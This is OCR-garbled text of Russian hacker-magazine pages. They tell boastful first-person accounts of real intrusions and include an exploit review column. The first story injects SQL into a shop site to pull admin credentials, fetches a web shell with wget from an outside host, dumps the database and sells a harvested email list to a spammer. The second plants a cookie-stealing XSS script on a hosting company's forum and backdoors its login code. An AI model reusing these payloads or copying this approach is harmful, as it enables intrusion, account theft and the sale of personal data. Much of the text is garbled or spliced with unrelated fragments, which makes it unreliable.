И!!р://зИор.ги/са!аІод.рНр?ісІ=14' 

ѴѴагпіпд: туздНе!сІп_аітау(): зиррііеб 

агдитеп! із по! а ѵаііб МуЗОІ_ гезиі! гезоигсе 
іп /изг/Иоте/збор/И!тІ/зІіор/са!аІод.рІпр оп 
Ііпе 49 

ѴѴагпіпд: туздИгее_гезиІ!(): зиррііеб 

агдитеп! із по! а ѵаііб МуЗОІ_ гезиі! гезоигсе 
іп /изг/Иоте/збор/И!тІ/зІіор/са!аІод.рІпр оп 
Ііпе 50 

«Отлично, — подумал я, — теперь у меня 
есть зацепка. » Далее мне было необходимо 
узнать имя базы и поля . Здесь у меня особых 
затруднений не возникло, потому что назва- 
ние базы было изегз, а нужные мне поля вы- 
глядели дефолтно, и мой запрос поменялся 
на следующий вид: 

\д/ѵѵѵѵ.зИорги/са!аІод.рИр?іб=14%20ипіоп% 
20зеІес!%20етаіІ%20!гот%20изегз%20Ііт 
і!%200, 1 

Этот запрос выплевывал мне первый ло- 
гин пользователя — в моем случае это был 
админ. Второй запрос выглядел следующим 
образом и давал мне админский пароль: 

ѵѵѵѵѵѵ.зНор.ги/са!аІод.рНр?іб=14%20ипіоп% 
20зеІес!%20разз\д/огб%20!гот%20изегз%2 
01іті!%200, 1 
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СПА| 



ко ЗА ПОКУПКУ 1 
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И!!р://гз!.ѵоіб.ги/боѵѵпІоаб/г57зИеІІ.!х! — 
г57зИеІІ последней ветки от гз!. 
И!!р://раске!з!огтзесигі!ѵ.пІ — рай для хакера. 
И!!р://зесигі!ѵіп!о.ги/ — большое количество 
уязвимостей в ѵѵеЬ-приложениях и много 
документации назесигі!ѵ-темѵ. 
И!!р://ш24-!еат.пе!/геІеазез/ш24 ііге.гаг — 
полная версия моего скрипта. На момент 
написания статьи — 0. 1 



Результат запроса меня приятно удивил. 
Вместо зашифрованного хэша админа я 
увидел обычный незашифрованный па- 
роль! Теперь я владел всеми админскими 
данными, которые могли помочь мне по- 
пасть к нему в админку. Проблема состоя- 
ла лишь в том, что эту самую админку мне 
нужно было найти. Я попробовал дефолт- 
ные админские каталоги типа /аРт,/аРтіп, 
/асітіпізігаіог и т.д., но в ответ ничего не по- 
лучил. Далее мною было решено врубить 
свой сді-сканер с приличной базой уязви- 
мостей, с помощью которого я вполне мог 
бы найти какие-то интересные папки, где 
могла бы находиться администраторская 
панель сервера. Я набрал десятиметровую 
базу уязвимостей и забил все это в файл 
ѵиІп.!х!. Потом я наколбасил небольшой 
скрипт для оценки серверных каталогов (он 
же сді-сканер). Мой сорец получился при- 
мерно следующего содержания: 

иве ІО::Зоске!; 
изе зігісі; 

і!(@АВОѴ < 2) { изаде(); } 
ту ($Ьоз!пате, $!іІе, $рог!) = @АВОѴ; 

$рогіог$рогі = 80; 

$Ьоз!пате=~з/ л Іі!!р:ѴѴ//; 

$!юз!пате=~з/Ѵ$//; 

ореп(РІІ_Е,"<$!іІе") ог сііе "РІІе $!іІе по! !оипсІ!\п"; 
ргіпі "[-] Зсап зіагіесі ($Ьоз!пате:$рог!).\п"; 
ѵѵГііІе(ту $Ьид=<РІІ_Е>) { 
с!ютр$Ьид; 

$Ьид = "/".$Ьид ипіезз ($Ьид =~ / Л Ѵ/); 
ргіпі "$!юз!пате$Ьид\п" і! зсап($Ьид); 

} 

сІозе(РІІ_Е); 

ргіпі "[-] Зсап ІіпізИесІЛп"; 

зиЬзсап{ 

ту$з!гіпд=зЬі!!; 



ту $гето!е = ІО::5оскеі::ІІ\ІЕТ->пеѵѵ ( Рго!о => 
"!ср", РеегАсІсІг => $!юз!пате, РеегРог! => $роП ); 
ипіезз ($гето!е) { ргіпі "сап 1 ! соппесіХп"; ехі! 0; } 
$гето!е->аи!о!ІизІп(1 ); 
ту $И11р = дцІНЕАО $з!гіпд НТТР/1 . 1 
НОЗТ: $!юз!пате 
}; 

ргіпі $гето!е$Ы1р; 

\л/Ы1е(<$гето1е>) { 

ге!ит "ок" і!(/НТТР.+?200\зОК/) ог геіигп ипсіеі; 

} 

} 

Ничего особенного — простенький 
алгоритм небольшого размера. Сканер 
должен быть с тремя параметрами. Пер- 
вый — это атакуемый хост, второй — файл 
с уязвимостями и третий — это порт, по 
которому будет проходить сканирование. 
Я законнектился на шелл, слил туда ска- 
нер и с чувством самоудовлетворения за- 
пустил его через несколько минут. Сканер 
остановил свою работу. Результатом ска- 
нирования стали несколько левых папок и 
еще один приметный каталог со знакомым 
мне названием. Я перешел по найденной 
папке и попал на главную страницу какой- 
то гостевой книги. Копирайты не дали мне 
нужной инфы, поэтому я решил все делать 
ручками. В гесте были: несколько отзывов 
о сайте, левые базары о новых поступив- 
ших товарах и т.д. Для меня это не имело 
никакогозначения. Я ненароком подставил 
в конец ссылки /а сітіп и быстро очутился в 
панели авторизации для администратора. 
«Это уже хорошо», — подумал я, — и поп- 
робовал подставить найденный логин и 
пароль в форму для админа. Я не поверил 
своим глазам ! ! ! Логин и пасс действитель- 
но подошли! 



РЕЗУЛЬТАТ ЗАПРОСА МЕНЯ ПРИЯТНО УДИВИЛ. 
ВМЕСТО ЗАШИФРОВАННОГО ХЭША АДМИНА Я УВИ- 
ДЕЛ ОБЫЧНЫЙ НЕЗАШИФРОВАННЫЙ ПАРОЛЬ! ТЕ- 
ПЕРЬ Я ВЛАДЕЛ ВСЕМИ АДМИНСКИМИ ДАННЫМИ, 
КОТОРЫЕ МОГЛИ ПОМОЧЬ МНЕ ПОПАСТЬ К НЕМУ 
В АДМИНКУ. 
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«дамп-таблицы базы данных» — одна из удобных возможностей г57зИеІІ 



НЕМНОГО О ССХ-СКАНЕРМС 



Говоря о сді-сканерах, следу- 
ет учесть во, что . Во-первых 
ты должен знать самый прос- 
той алгоритм работы сканера 
у любого сканера изначально 

вимостей, которая может 
подняться как вручную, так 
автоматически. Сканер мо- 

же *аботать через ргоху или 
ІЗ него. ОН должен уметь 
I логи и иметь корешую 
[ответов сервера на ра 

[ошибки . необязательным, 

[дательным вариантом яв- 
і я включенный в исходник 

[та іогк, что весьма при- 
[ скорости сканеру. Вот 
(алгоритм работы. Все это 
■ не делать. Яркий тому 
*р - мой скрипт, исполь 
Ій в статье. Если ты за- 
Тся целью написать свои 
[венный, куда более про- 
[тый сканер, чем мои, то 
|ую брать готовую основу 

Іра, например пікбо, и уже 

■сочкам налеплять на него 



О, 5НЕЕТ БОиВЪЕ-ВиС, СООБ 



Теперь мне было необходимо найти заце- 
почный вариант для продвижения взлома. 
Я немного побегал по админке, и вот что 
мне удалось узнать. Геста имела свой ап- 
лоад-скрипт картинок, но после проверки 
на фильтры я понял, что с ним нет никакого 
смысла возиться. Также была возможной 
опция редактирования шаблонов. Я попы- 



система выплюнула доступные на запись 
папки. Выбрав одну из них, легкими мани- 
пуляциями я залил г57зГіеІІ на сервак: 

ѵѵдеі -О ирІоаЦ/ітаде/ЬиПоп/12аз344зае32азЗд. 
рГір Иіір://гзі.ѵоісІ.ги/сІоѵѵпІоасІ/г57зІпеІІ.іхі 

Отлично, шелл успешно залился, и теперь 
я мог удобно работать с директориями 



кому, поэтому я не стал париться, а просто 
отсортировал мыльники из базы и забил 
их в файл таіІТхІ. Благо мыльников полу- 
чилось около 80000 — 100000, что весьма 
неплохо подходило под спам-лист, учиты- 
вая тот факт, что 99% мейлов на подобных 
серверах — чистый воды валид, который 
в дальнейшем можно было бы пустить в 
расход. 



ОТЛИЧНО, ШЕЛЛ УСПЕШНО ЗАЛИЛСЯ, И ТЕПЕРЬ Я МОГ СПОКОЙНО РА- 
БОТАТЬ С ДИРЕКТОРИЯМИ СЕРВЕРА. ПЕРВЫМ ДЕЛОМ Я ПРОШАРИЛ 
ВЕСЬ СЕРВЕР НА НАЛИЧИЕ КРЕДИТОК. . . 



тался отредактировать один из них, под- 
ставив в конец простенькую конструкцию 
кода <? ра85іИги('ісГ);?>, но, естественно, 
не получил ожидаемого результата. Тогда 
я обратился к скрипту розіег.ріір, кото- 
рый отвечал за добавление новых сооб- 
щений в гостевой, и попытался добавить 
новый мессадж с тем же содержанием (<? 
раззІИгиСісГ); ?>). И что ты думаешь? Да, 
скрипт действительно был немного дыря- 
вым, охотно исполняющим вражеский рбр- 
код. На сервере крутилась ІгееЬзб 5.4, от 
которой я сразу отвернулся. По команде: 

ЛпсІ / Чуре сі \( -регт -2 -о -регт -20 \) -ехес Із -Ісід {} \; 



сервера. Первым делом я прошарил весь 
сервер на наличие кредиток, но почему-то 
не нашел вообще ни одной карты. Только 
в тот момент до меня дошло, что на сер- 
вере не будет кред, так как форма для 
вбива карт вообще отсутствовала. Тут 
меня посетил большой облом по поводу 
содеянного. Неужели все напрасно? «Ну 
нет», — подумал я про себя и устремился 
на поиски конфига тузці. Через 5 минут 
он был у меня, и я уже владел дампом всей 
базы сервера. Зачем мне дамп? Хе, разве 
дядя ІогЬ не учил вас тому, что база данных 
— это то, что можно продать за круглень- 
кую сумму? Но продавать мне ее было не- 



МІ35ІОЫ СОМРЪЕТЕБ! 



Вот так вот. После этой истории злобные 
админы снесли с сайта гостевуху и нало- 
жили соответствующие патчи на сервер- 
ный софт. Через несколько дней после 
моего поста на одном из форумов ко мне 
стукнулся один заинтересовавшийся моим 
спам-листом человек, который удачно при- 
обрел его у меня, что не могло не радовать. 
Я всегда говорил: в любом взломе должна 
быть хоть какая-то выгода, даже в мораль- 
ном виде :). Суа! 

ВШАВУУОЦВ5 -Ц- 
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Рнпойойісотруііннк нькьйурк$іа>гіэ банка убивал н 
гу&лс зс ией і і гленои забег илов к и йбсйп ютно мслнакшмог і> 
мужчину. Ничем* йсобмчішгоЧія города, н кшоуѵч 
убийства происходят каждый лап».,, сел» бы нс идно но. 
ЛугасКеЙн іАотел убивать ггпго человека, І^і нцдсл н 
. .«нм^ана ді происходящее. по ничего не мор с собой 
|КЯ?.іЗп>. И -больш е всего на спае ему хочется ушатъ, , 
'гго Уставило его сдосшіить убийство. 



тш\ икишіікГг 

■■ і ыаіл шшл ш ы _И™. 



Я4мн 
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РЕАВ 

/ ГЕАП@СѴВЕПІ_ОПО$.МЕТ/ 



Взлом / 04 

ІІЧѴІ8ЮІЧ 

РОѴѴЕР 




Ты много слышал о багах в 
таких монстрах форумной 
индустрии, как ІРВ, рЬрВВ 
и ѵВиІІеШі. Каждую неде- 
лю их становится больше. 
Казалось бы, безопасность 
таких движков должна уве- 
личиваться в геометричес- 
кой прогрессии, но вместо 
этого производители вы- 
пускают все новые и новые 
версии форумов, добавляя 
свежие баги. Что, скажешь 
не так? Я попытаюсь тебя в 
этом переубедить. 



В поисках жертвы 

Был холодный зимний день. Выходить наулицу совсем не хотелось, 
поэтому я врубил свой ноутбук. В аське почти все были оффлайн, 
и я решил заняться полезным делом — поиском багов :). Благо в тот 
момент у меня был архив с десятком разнообразных движков, так 
что я сразу начал осмотр «пациентов». Улов был совсем невелик 
— всего лишь парочка пассивных хзз. Но тут я вспомнил про один 
известный форум, который лежал у меня в отдельном архиве. Это 
был Іпѵізіоп Роѵѵег Воагб 2.1.3. 

Возможно все 

Настроение от этого не сильноулучшилось. Навернякадвижокуже 
тестили сотни хакеров, и найти баг тут будет нелегко. Вначале все 
указывало именно на это. Я менял значения параметров везде, где 
только можно, вставлял одинарную кавычку и волшебную конструк- 
цию <зсгірІ>аІегѣ()</зсгірІ> во все возможные переменные, но ниг- 
де не было ошибок. И тутя не нашел кнопку для жалобы насообще- 
ние. Любой юзер, нажав туда, может написать причину, по которой 
ему не нравится данное сообщение. Потом оно попадает ко всем 
модерам и админам форума. Именно последнее обстоятельство 
меня серьезно заинтересовало. Я вставил строку <зсгірІ>аІегІ()</ 
зсгірЬ> внутрь сообщения и был вознагражден за упорство: выско- 
чил алерт. Теперь оставалось составить простенький іаѵа-скрипт 
для кражи кукисов, что у меня получилось довольно быстро: 

<зсгірІ>ітд = пеѵѵ Ітаде(); ітд.згс = "Др://апІісІіаГогд/з/тузпіІТ 
діІ?"+боситепГсоокіе;</зсгірІ> 

Как ты уже понял , ни о какой фильтрации речи не шло. Как это упус- 
тили программисты ІРВ — не понимаю. Пришло время испробовать 
уязвимость на практике. Закупив список свежих проксиков, я ри- 
нулся вбой. Было интересно, многоли форумов вСети подвержены 
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этому багу. Ломать какие-то простенькие форумы мне не хотелось 
— если играть, то играть по-крупному. Поэтому в поисковик я забил 
строку «Роѵѵегеб Ьу Іпѵізіоп Роѵѵег ВоагсІ зііе:доѵ». 

Ломанем .доѵ? 

(Зоодіе выдал достаточно ссылок, но рабочих оказалось всего две, 
и обе вели на сервер ІЧАЗА. Я зашел на форум, зарегался (нередко 
на форумах в зоне «доѵ»регистрация закрыта) и пожаловался на 
первое попавшееся сообщение. Тупо вставлять один лишь іаѵа- 
код было бы слишком рискованно, поэтому я быстро написал, как 
мне показалось, правдоподобное сообщение и нажал «Отослать». 
В конце текста я, как бы невзначай, вставил строку: 

<зсгірЫтд = пеѵѵ Ітаде(); ітд.згс = "ИПр://апгісИа1.огд/з/тузпіІІ. 
ді(?"+боситепТсоокіе;</зсгірЬ" 



Прошло несколько дней, а кукисов у меня на почте по-прежнему 
не было. По всему выходило, что админ забил на форум и не читал 
сообщения в админке. Что ж, придется поискать другие проекты. 

Запрос «РоѵѵегесІЬуІпѵізоп Роѵѵег ВоагсІ хостингзііети» в гугле — 
и вот я уже рассматриваю страницу с бажными ресурсами. Вторая 
выданная ссылка вела на сайт «лучшего хостинга» ѵѵѵѵѵѵ.ѵіаііозі.ги. 
и серьезно меня заинтересовала. Я быстро зарегистрировался и 
опять пожаловался на рандомное сообщение: 

«Здравствуйте. У меня возник 
один вопрос: какие именно вер- 
сии Му8ц1 и РНР установлены у 
вас на сервере? На сайте я ниче- 
го об этом не нашел. Для меня 
это очень важно. 

Заранее спасибо ! » . 

Ну и, конечно, в конец сообщения я добавил уже знакомую тебе ядо- 
витую строчку. Буквально через несколько часовхэш пароля и иден- 
тификатор админской сессии были на моем снифере. Быстренько 
подменив свои кукисы админскими, я вошел на форум. Надпись в 
верхнем левом углу гласила, что мой ник теперь — «Зирроіі» . 

Засланный казачок 

Буквально через пару минуту меня возник вопрос: какзакрепиться 
на форуме под админом? Логично, что лучший способ для этого 
— изменить исходники самого форума таким образом, чтобы он, 
при определенных условиях, пускал в админскую зону безо вся- 
кого пароля. Вариантов таких изменений, сам понимаешь, очень 
много. Я даже подумал, что, наверное, это уже изученная тема и что 
наверняка есть готовые наборы протрояненных скриптов. Я обра- 
тился к «профессионалам» на античат.ру и получил потрясающий 
ответ. Чувак с ником «кІЬОгда» предложил просто убрать форму 
аутентификации в админской зоне, чтобы каждый желающий мог 
залогиниться просто так. Решение по сути своей маразматичное, и 
ничего, кроме улыбки, на лице оно вызвать не может :). Я поступил 
по-другому. Просто в каждый из файлов — абтіпДипсІіопз.рбр, 
Іодіп.рИр и здІ_туздІ.рНр — в место, где расположен блок аутенти- 
фикации, я добавил через II (логическое «или») условие передачи 
скрипту ОЕТ-параметра с длинным и известным только мне назва- 
нием. Это решило все проблемы, и я успешно забэкдорил форум 
на сервере хостинговой площадки. 

ВІЫАВУ ѴОІЖ’ЗЗЕ 



Секреты ІРВ 



Заливаем шелл 

У неподготовленного читателя может возникнуть 
вполне резонный вопрос: возможно ли загрузить 
\геЪ-шелл через админку в ІРВ? Конечно, возможно. 
Опишу, как это делается. 

В ІРВ 1.3 

Заходим в раздел Абтіпізітаітоп, жмем Мапа§е 
ЕтоТісош, опускаемся вниз страницы и видим 
такую строку: «ТЧрІоасІ ап ЕшоТісоп То тЬе ешотісопз 
сіігестогу». Жмем кнопку В готе и выбираем из спис- 
ка файлов на локальном компьютере скрипт с \ѵеЪ- 
шеллом. В какую папку загрузится шелл — зависит от 
версии форума: 

1.3 — / іогат /Ьтті / етоТісош / зЬеІІ.рЬр 
2 . * — /Іотт/5Ту1е_етоТісоп5 / беГаик/зЬеП.рЬр 

В ІРВ 2.* 

Выбираем ЕООК & ЕЕЕЕ, потом — ЕшоТісоп 
Мапа§ег. Здесь нужно будет поставить галочку на- 
против папки, куда будут загружаться «смайлы» — в 
нашем случае, паленые тѵеЬ-скрипты для взлома. 




Дампим по-быстрому 

Как ни странно, но зачастую многие начинающие 
взломщики даже не знают, как сделать дамп базы 
данных, и после входа в админку просто теряются. 
Поэтому я решил затронуть и этот аспект. Если нуж- 
но скопировать всю базу данных, проделываем сле- 
дующие действия: переходим во вкладку «Прочее» -*• 
смотрим сбоку блог «Управление 8 (ДБ» -*• выбираем 
«Резервная копия» -*жмем «Начать резервное 
копирование». Но я считаю, что делать дамп всей 
базы — лишняя трата времени. Проще просмотреть 
нужную таблицу. Делается это так: «Прочее» -*• «Уп- 
равление 8 (ДБ» «Утилита» -*• Выбираем нужную 

таблицу. Логины и пароли всех участников форума 
хранятся в таблице «іЫЛпетЪегз» или «іЫ^зеззіопз». 



Свежая инъекция 

Недавно ребята из т24 нашли новый баг. В скрипте 
саІепбаг.рЬр в функции са1_еѵепі:_8аѵе( $Суре='а<ісГ ) 
отсутствует проверка на тип в переменной еѵепі:_ісІ: 

$еѵепі:_ісІ = $сЫ5->ір5с1аз5->іпри1:[ ' еѵепі:_ісІ ' ] ; 

Эта переменная вставляется напрямую в запрос к БД: 

$1:Ы5->ір5с1а88->ВВ->5Ітр1е_соп8Ггас1:( аггау( 'зеІесБ 
=>'*', Чгот' => 'са1_еѵепС8', ЧѵЬеге ' => "еѵепі_ 
ісІ=$еѵепі:_ісГ ) ); 

Это позволяет модифицировать запрос к базе данных: 
іпс1ех.рЬр?асГ=са1еп(Іаг&со(іе=с1оес1іі:&Гуре=с]с]с]&е 
ѵепг_ісІ=_8С)Е. Для успешной эксплуатации данной 
уязвимости необходимо обладать правами для ма- 
нипуляции с событиями календаря (добавление/ре- 
дактирование ) . Для исправления данной уязвимости 
достаточно $еѵепі:_ісІ = ЗііЫз-мрзсІазз-мприф'еѵепі^ 
іб']; заменить на $еѵепі:_іб = іШѵа1($іЬіз->ір8с1аз8- 
і >іпри1: [ ' еѵепі:_іб ' ] ) ; . 
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Журнал «Хакер» 
и компания Ргезіідіо объяв- 1 
В г ляют конкурс: ты можешь выиг- 
Ш рать один из трех крутых и модных 
щ медиа плееров Ргезіідіо РМРР-301 
^ с жестким диском. Для этого тебе 
понадобится как следует поработать, 
проявить творческий потенциал, 
почувствовать позитивные вибрации, 
и вообще, выделиться из толпы! 



Тебе нужно записать собственный трек в про- 
извольном формате. Самое главное требова- 
ние — чтобы это было позитивно и весело. Мо- 
жет, ты круто читаешь речитатив обо всем, что 
видишь, и вы с приятелем положите это дело 
на биты? Или, может, ты делаешь классную 
музыку в ОЬазе, и под нее зажигают все твои 
друзья? В любом случае, присылай свои рабо- 
ты на ро5Шѵе1гаск@ геаі.хакер.ги и будь уверен: 
трое самых талантливых и веселых авторов 
получат достойную награду. Медиа-плееры 
Ргезіідіо РМРР-301 ждут тебя. 



Если ты еще никогда не ощущал себя музыкантом, 
не отчаивайся. На нашем диске ты найдешь РОР Спе- 
ца, посвященного цифровому звуку, а также подборку 
программ для создания и обработки звука. 
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ДОКУЧАЕВ ДМИТРИЙ 



РОВВ 



ЕХРЮІТЗ 



ѴѴіпсІоѵѵз Мѳсііа РІауег <=ѵ. 1 0 ЬиІІѳг оѵегііоѵѵ 
ехріоііз 



описание: 15 февраля на страницах 
багтрака появились упоминания о множес- 
твенных уязвимостях в известном проигры- 
вателе ѴѴіпсІоѵѵз Мебіа РІауег. Первая из них 
заключалась в переполнении буфера при 
прямом обращении к тесііа-файлу, выло- 
женному на ѴѴѴѴѴѴ. Несложно догадаться, 
что эксплойт представляет собой подлож- 
ную НТМІ_-страницу с неказистым тэгом 
ЕМВЕй ЗРС. А если быть еще точнее, то 
эксплойт поставляется в виде РегІ-модуля, 
открывающего сокет и переполняющего 
буферу ѴѴМР. 

Уязвимость срывает крышу у плеера при 
открытии специального файла ВМР, в за- 
головке которого объявлен размер 0 байт. 
Шелл-код, записанный в Віітар-картинке, 
выполняется с правами текущего пользо- 
вателя. Однако выложенный эксплойт де- 
монстрирует лишь йоЗ-атаку на ѴѴМР. 

защита: с помощью специальных патчей 
можно избавиться от уязвимости. Список 
заплаток находится здесь: ѵѵѵѵѵѵ.зесипІѵІаЬ. 
ги/ѵиІпегаЫІііѵ/26251 7.рИр . Категорически 
не советую открывать Меб іа-файлы с неиз- 
вестных ресурсов. 

ссылки: эксплойт для первой уязвимос- 
ти находится тут: ѵѵѵѵѵѵ.зесигііѵІаЬ.ги/рос/ 
ех1га/262743.рІір . для второй здесь: ѵѵѵѵѵѵ. 
зесигі1ѵІаЬ.ги/рос/ех1га/262735 . Іір . Подроб- 
ное описание бага можно найти на страни- 
це /ѵѵѵѵѵѵ.зесигі1ѵІаЬ.ги/ѵиІпегаЬіІі1ѵ/262517. 

еЬе- 

злоключение: уже в который раз очеред- 
ная локальная уязвимость в продукте М3 
подмочила репутацию корпорации. Радует 
лишь то, что первый баг (при обращении 
к тесііа-файлу) не работает в ІЕ, зато пре- 
красно убивает ѴѴМР в других браузерах. 

дгееіз: первооткрывателем багов стала 
известная команда Юеіепзе. Авторы экс- 
плойтов до сих пор неизвестны. 




смерть для ѴѴМР 



МуЗОІ_4.х/5.0 ІІзег-ОеІіпесІ Еипсііоп І_осаІ 
Ргіѵііеде Езсаіаііоп Ехріоіі 



описание: локальная уязвимость, на- 
правленная на МуЗОІ_-сервер. Хакер может 
создать специальную библиотеку, затем 
внедрить ее в МуЗОІ_как функцию и вызвать 
эту функцию с набором команд в качестве 
аргумента. В итоге МуЗСХО выполнит все 
команды под повышенными правами (обыч- 
но под пользователем гооі). Затем хакер 
запустит командный интерпретатор и на- 
сладится прелестями рутовых прав. 
Помимо этого бага, существуют еще два, но 
пока в паблике для них нет эксплойтов. 
Выпущенный эксплойт представляет собой 
ту самую вредоносную библиотеку с под- 
робным указанием к действию (компиля- 
ции, подключению и, собственно, внедре- 
нию). Все расписано по шагам , так что даже 
скрипткидис разберется в эксплойте. 

защита: эксплойт протестирован на 
МуЗОІ_ 4.1.14. Все дальнейшие версии, 
по словам создателей, неуязвимы. Так что 
самый правильный способ защиты — свое- 
временное обновление сервиса МуЗОІ_. В 
принципе, можно использовать и уязвимый 
мускул, но при этом необходимо запретить 
запись в базу МуЗОІ_ всем пользователям. 

ссылки: публичный эксплойт находится 
здесь: ѵѵѵѵѵѵ.зесигііѵІаЬ.ги/ 
рос/ех1га/263Ю2.рІір .Описаниеѵязвимости 
(как этой , так и других) можно найти на стра- 
нице шш^зещітГуІаЫіі/уи^ 
вЬе. 

злоключение: МуЗОЮ — один из самых 
популярных процессов, который можно 
встретить на линуксовых серверах. Поэ- 
тому данная уязвимость будет весьма по- 
лезна хакерам при локальных нападениях. 
Особенно учитывая тот факт, что админис- 
траторы редко запускают МуЗОЮ под не- 
привилегированными правами. 



ЕгееВЗй 6.0 (пізсі) Ветоіе КегпеІ Рапіс 
ОепіаІ оІЗегѵісе Ехріоіі 



описание: наконец хакеры добрались до 
самой защищенной в мире 05 — ЕгееВЗй. 
Досадная уязвимость закралась в ЫЕЗ-де- 
моне — сервисе, управляющем сетевыми 
файловыми системами. Данная служба 
прослушивает порт 2049. Если он открыт, 
злоумышленник может отправить на порт 
несколько байт мусора, в результате у сер- 
виса переполнится буфер, что повлечет за 
собой полную остановку системы — кегпеі 
рапіс. 

Сплоит написан на языке РегІ и не пред- 
ставляет собой ничего сложного — простое 
открытие сокета и отправка шелл-кода на 
порт 2049. После этого системауйдет в про- 
должительный шатдаун. 

защита: в настоящее время защиты от 
уязвимости не существует. Поэтому следу- 
ет либо отказаться от использования пТзсІ, 
либо фильтровать 2049 порт при помощи 
встроенного файрвола ірТѵѵ. 

ссылки: рабочий эксплойт можно скачать 
по ссылке: ИДр://ѵѵѵѵѵѵ.зесип1ѵІаЬ.ги/рос/ 

ех1га/263336.рІтр . Небольшая техническая 
информация находится здесь: ІтДр://ѵѵѵѵѵѵ. 
зесигі1ѵІаЬ.ги/ѵиІпегаЬіІі!ѵ/зоигсе/263236. 
рИр. 

злоключение: ЕгееВЗО-Теат была уве- 
домлена об уязвимости 3 недели тому на- 
зад, но реакции на баг пока не последовало. 
Видимо, у кодеров имеются более сущест- 
венные проблемы, нежели выпуск заплатки 
к ядру, предотвращающей йоЗ через пізб. 

дгееіз: о баге сообщил русский багоиска- 
тель Евгений Легеров ( ѵѵѵѵѵѵ.аІеа.пеД . Про- 
стенький эксплойт был написан кодером 
зІгОке из команды тіІѵѵОгт ( тіІѵѵОгт.сот Ѵ 
Объявляем благодарность этим талантли- 
вым людям. 



дгееіз: благодарим багоискателя Магсо 
Іѵаісіі гар1ог@0хсІеабЬееІ.іпІо за написание 
чудесного эксплойта. 







Г-а- т ■* ■ 


г-, _ 






поднятие прав через Му50І_ 


1 короткий код эксплойта 
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РЕѴІЕѴѴ 



Іпѵізіоп Роѵѵег ВоагсІ <2.1.4 РаззѵѵогсІ 
сИапдѳ ЗОЫпіѳсІіоп Ехріоіі 



Арріѳ Мае 05 X "/изг/Ьіп/раззѵѵсІ" Віпагу 
І_осаІ Ргіѵііеде Езсаіаііоп (гооі) Ехріоіі 



5С0 ІІпіхѵѵаге 7.1.3 (рігасе) І_осаІ Ргіѵііеде 
Езсаіаііоп Ехріоіі 



описание: о проекте ІРВ много говорить 
не следует — все знают эту борду и ее нашу- 
мевшиебаги.Вэтоммесяценашахакерская 
тусовка решила написать эксплойт к пред- 
последней версии ІРВ. Баг представляет 
собой недостаточную обработку входных 
данных, в результате которой злоумышлен- 
ник может выполнить 50І_-инъекцию на фо- 
руме. Данный эксплойт позволяет любому 
пользователю получить ссылку для сброса 
пароля. Примечательно, что эксплойт пол- 
ностью написан на РНР и требует всего 
лишь включенного модуля СІІРІ_ для пере- 
дачи данных. 

Эксплойт имеет некоторые настроечные 
параметры. Скажем, хакер можетиспользо- 
вать Зоскз для передачи, установить файл 
сохранения Соокіе или изменить ІІзегАдепІ. 
Все это выполняется в заголовочной части 
РНР-кода. 

защита: кодеры ІРВ быстро отреагирова- 
ли на уязвимость — были выпущены специ- 
альные защитные заплатки. Взять их можно 
на официальном сайте: ѵѵѵѵѵѵ.зрір.пеі . Аль- 
тернативный способ — переустановка фо- 
рума на более стабильную версию. 

ссылки: эксплойт хранится по ссылке: 
ѵѵѵѵѵѵ.зесигі1ѵІаЬ.ги/рос/ех1га/263727.рИр . 
Несколькословпоповодуобновленияможно 
найти здесь: ѵѵѵѵѵѵ.зесигіМаЬ.ги/ѵиІпегаЬіІіІѵ/ 
зоигсе/263633.рІір . 

злоключение: ошибки в форумах — ла- 
комые баги для скрипткидисов. Здесь боль- 
шого ума не надо: залил эксплойт и получил 
пароль администратора. С поиском баж- 
ных серверов тоже проблем нет — Ооодіе и 
Ѵапбех все сделают за человека :). 

дгееіз: благодарим наших хакеров, ІМіігех 
и Эикепп, а также небезызвестных людей: 
Эг_ІІР0_51 , кОра, І\І5Э и ІЧаікоп. Желаем им 
трудиться и дальше на благо багтраков! 



описание: ты когда-нибудь получал шелл 
на МасОЗ? Я — да. И надо сказать, что это 
самая неуязвимая система, которую я ви- 
дел. Если даже для древней 5С0 можно 
найти эксплойт, то с Арріе МасОЗ все было 
сложнее. До недавнего времени. Багои- 
скателями выпущен новый эксплойт для 
/изг/Ып/раззѵѵсІ. Его принцип очень прост: 
при запуске /изг/Ып/раззѵѵсІ создается вре- 
менный файл в папк е/ітр. Эксплойт делает 
симлинк на этот файл с помощью подде- 
льного Іаке_раззѵѵсІ-файла, заранее слин- 
кованного с /еіс/зисіоегз. В результате этой 
махинации /еіс/зисіоегз видоизменяется, и 
становится возможным запустить «зибо зИ» 
под произвольным пользователем. 
Эксплойт написан на языке РегІ и снабжен 
подробным комментарием к использова- 
нию в заголовочной части. 

защита: единственным способом защиты 
от уязвимости является установка обновле- 
ния с официального сайта ѵѵѵѵѵѵ.арріе.сот . 

ссылки: эксплойт доступен на странице: 
ѵѵѵѵѵѵ.зесигі1ѵІаЬ.ги/рос/ех1га/263496.рІір . 
Немного технической информации мож- 
но взять отсюда: НДрѴ/ѵѵѵѵѵѵ.зесигіМаЬ.ги/ 
ѵиІпегаЫІіІѵ/263470.рІір . 

злоключение: пусть МасОЗ не самая 
распространенная система в Сети, но пару 
шеллов на таких серверах мне удавалось 
взять. Удаленные нападения обычно произ- 
водятся через ѴѴеЬ, а вот с локальными до 
последнего времени было туговато. Пока не 
появился вышеописанный эксплойт :). 

дгееіз: благодарим малоизвестного хаке- 
ра по кличке ѵабе79/ѵ9 ( ѵ9@ІакеИаІо.из ) за 
чудодейственный эксплойт. Что касается 
самих багов, то список исправлений (в том 
числе и в /изг/Ып/раззѵѵсІ) был официально 
опубликован корпорацией Арріе. 



описание: самой эффективной и универ- 
сальной ошибкой в Ыпих-ядрах была уязви- 
мость в рігасе. Долгое время багоискатели 
находили новые и изощренные методы по- 1 
лучения рута через эту ядерную функцию. 
Баг притаился и в системе 5С0 ІІпіхѵѵаге I 
7.1.3 и был обнаружен совсем недавно. 
Принцип уязвимости тот же самый: запуск 
функции р1гасе() и последующее получе- 
ние рутовых прав. Эксплойт должен запус- 
каться с аргументом суидного приложения, 
например /ипіхѵѵаге/изг/ІІЬ/зепЬтаіІ, только | 
в этом случае гарантируется получение по- 
вышенных привилегий. К сожалению, тех- 1 
нические подробности этой уязвимости не | 
раскрываются. 

защита: единственным способом защиты I 
является установка спасительного патча | 
с официального сайта ѵѵѵѵѵѵ.срапике.сот . 
Если ты администрируешь 5С0, то немед- 1 
ленно заходи туда и скачивай все необхо- 
димое. 

ссылки: эксплойт находится по адресу: | 
ѵѵѵѵѵѵ.зесип1ѵІаЬ.ги/рос/ех1га/263228 . рІір . 
Скачивай его и тестируй, но только на дове- 
ренных тебе системах. 

